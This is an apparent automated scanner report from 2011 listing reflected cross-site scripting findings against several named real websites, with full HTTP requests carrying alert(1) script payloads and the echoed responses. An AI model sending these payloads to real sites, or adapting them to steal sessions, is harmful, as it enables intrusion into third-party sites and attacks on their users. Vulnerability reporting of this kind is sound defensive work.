GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1&9de62"><script>alert(1)</script>2b2bf4c448b=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:14:22 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:43:14 GMT;path=/;httponly Content-Length: 2873
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27040"><script>alert(1)</script>aafc10e2bc0 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com27040"><script>alert(1)</script>aafc10e2bc0&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:12:54 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:45 GMT;path=/;httponly Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8861"><script>alert(1)</script>1103dfbaf was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0b8861"><script>alert(1)</script>1103dfbaf&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:12:13 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:05 GMT;path=/;httponly Content-Length: 2863
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd298"><script>alert(1)</script>b6146d9bf2b was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1fd298"><script>alert(1)</script>b6146d9bf2b HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:13:11 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7845525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:42:03 GMT;path=/;httponly Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c936"><script>alert(1)</script>e5cf5050a89 was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=17949717c936"><script>alert(1)</script>e5cf5050a89&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:11:11 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:02 GMT;path=/;httponly Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41069"><script>alert(1)</script>db536dcf13f was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=1102030800259531941069"><script>alert(1)</script>db536dcf13f&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:11:55 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:47 GMT;path=/;httponly Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the load request parameter is copied into the XML document as plain text between tags. The payload 5cf32<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>318d6c3ecd0 was submitted in the load parameter. This input was echoed as 5cf32<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>318d6c3ecd0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74ac4'%3balert(1)//23282effb6e was submitted in the h parameter. This input was echoed as 74ac4';alert(1)//23282effb6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=7C8A652&w=300&h=25074ac4'%3balert(1)//23282effb6e&rnd=1219859 HTTP/1.1 Host: guru.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 384 Date: Thu, 03 Feb 2011 16:04:29 GMT
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=7C8A652&rand=" + myRand;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8759f"%3balert(1)//240ee4185ab was submitted in the pid parameter. This input was echoed as 8759f";alert(1)//240ee4185ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=7C8A6528759f"%3balert(1)//240ee4185ab&w=300&h=250&rnd=1219859 HTTP/1.1 Host: guru.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 384 Date: Thu, 03 Feb 2011 16:04:28 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=7C8A6528759f";alert(1)//240ee4185ab&rand=" + myRand;
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8e3b'%3balert(1)//7fbf4efe72 was submitted in the w parameter. This input was echoed as d8e3b';alert(1)//7fbf4efe72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=7C8A652&w=300d8e3b'%3balert(1)//7fbf4efe72&h=250&rnd=1219859 HTTP/1.1 Host: guru.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 383 Date: Thu, 03 Feb 2011 16:04:28 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=7C8A652&rand=" + myRand;
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d33ef"><script>alert(1)</script>784ccd9e713 was submitted in the REST URL parameter 5. This input was echoed as d33ef\"><script>alert(1)</script>784ccd9e713 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042d33ef"><script>alert(1)</script>784ccd9e713/ HTTP/1.1 Host: huntingtonhomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:53 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:56 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64846
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... nate" type="application/rss+xml" title=" Page not found - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042d33ef\"><script>alert(1)</script>784ccd9e713/feed/" /> ...[SNIP]...
1.167. http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11603"><script>alert(1)</script>ec87b8f4492 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 11603\"><script>alert(1)</script>ec87b8f4492 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/?11603"><script>alert(1)</script>ec87b8f4492=1 HTTP/1.1 Host: huntingtonhomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:29 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php Link: <http://huntingtonhomes.ocregister.com/?p=127042>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 130070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... ashed H.B. house on ‘Good Morning America’ - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/?11603\"><script>alert(1)</script>ec87b8f4492=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44602"><script>alert(1)</script>cd83832419c was submitted in the REST URL parameter 5. This input was echoed as 44602\"><script>alert(1)</script>cd83832419c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/repod-green-home-is-back-on-the-market/12710044602"><script>alert(1)</script>cd83832419c/ HTTP/1.1 Host: huntingtonhomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:10 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:12 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ternate" type="application/rss+xml" title=" Page not found - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/12710044602\"><script>alert(1)</script>cd83832419c/feed/" /> ...[SNIP]...
1.169. http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aba25"><script>alert(1)</script>01bcc28d4e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aba25\"><script>alert(1)</script>01bcc28d4e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/repod-green-home-is-back-on-the-market/127100/?aba25"><script>alert(1)</script>01bcc28d4e8=1 HTTP/1.1 Host: huntingtonhomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:07 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php Link: <http://huntingtonhomes.ocregister.com/?p=127100>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... po’d ‘green’ home is back on the market - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/?aba25\"><script>alert(1)</script>01bcc28d4e8=1feed/" /> ...[SNIP]...
1.170. http://hurricane.accuweather.com/hurricane/index.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://hurricane.accuweather.com
Path:
/hurricane/index.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 722b7"><script>alert(1)</script>9e1b639a6b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hurricane/index.asp?722b7"><script>alert(1)</script>9e1b639a6b3=1 HTTP/1.1 Host: hurricane.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Type: text/html Cache-Control: public, max-age=300 Expires: Thu, 03 Feb 2011 19:10:48 GMT Date: Thu, 03 Feb 2011 19:05:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 82496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <a rel="nofollow" href="/hurricane/index.asp?722b7"><script>alert(1)</script>9e1b639a6b3=1&unit=f"> ...[SNIP]...
The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81137"><script>alert(1)</script>7e000d53a18 was submitted in the partner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hurricane/index.asp?partner=accuweather81137"><script>alert(1)</script>7e000d53a18 HTTP/1.1 Host: hurricane.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Type: text/html Cache-Control: public, max-age=300 Expires: Thu, 03 Feb 2011 19:10:51 GMT Date: Thu, 03 Feb 2011 19:05:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 82064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <a rel="nofollow" href="/hurricane/index.asp?partner=accuweather81137"><script>alert(1)</script>7e000d53a18&unit=f"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f25b3"><script>alert(1)</script>e5fb01ad94c was submitted in the REST URL parameter 5. This input was echoed as f25b3\"><script>alert(1)</script>e5fb01ad94c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744f25b3"><script>alert(1)</script>e5fb01ad94c/ HTTP/1.1 Host: inyourface.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:29 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://inyourface.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 70357
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... k rel="alternate" type="application/rss+xml" title=" Page not found - In Your Face - www.ocregister.com" href="http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744f25b3\"><script>alert(1)</script>e5fb01ad94c/feed/" /> ...[SNIP]...
1.173. http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0f14"><script>alert(1)</script>e4a4ce6c848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0f14\"><script>alert(1)</script>e4a4ce6c848 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/?b0f14"><script>alert(1)</script>e4a4ce6c848=1 HTTP/1.1 Host: inyourface.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:12 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://inyourface.ocregister.com/xmlrpc.php Link: <http://inyourface.ocregister.com/?p=25744>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 84939
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... lication/rss+xml" title=" TV bride won more surgery than she knew - In Your Face - www.ocregister.com" href="http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/?b0f14\"><script>alert(1)</script>e4a4ce6c848=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4966c"style%3d"x%3aexpression(alert(1))"f842afe3d26 was submitted in the REST URL parameter 1. This input was echoed as 4966c"style="x:expression(alert(1))"f842afe3d26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
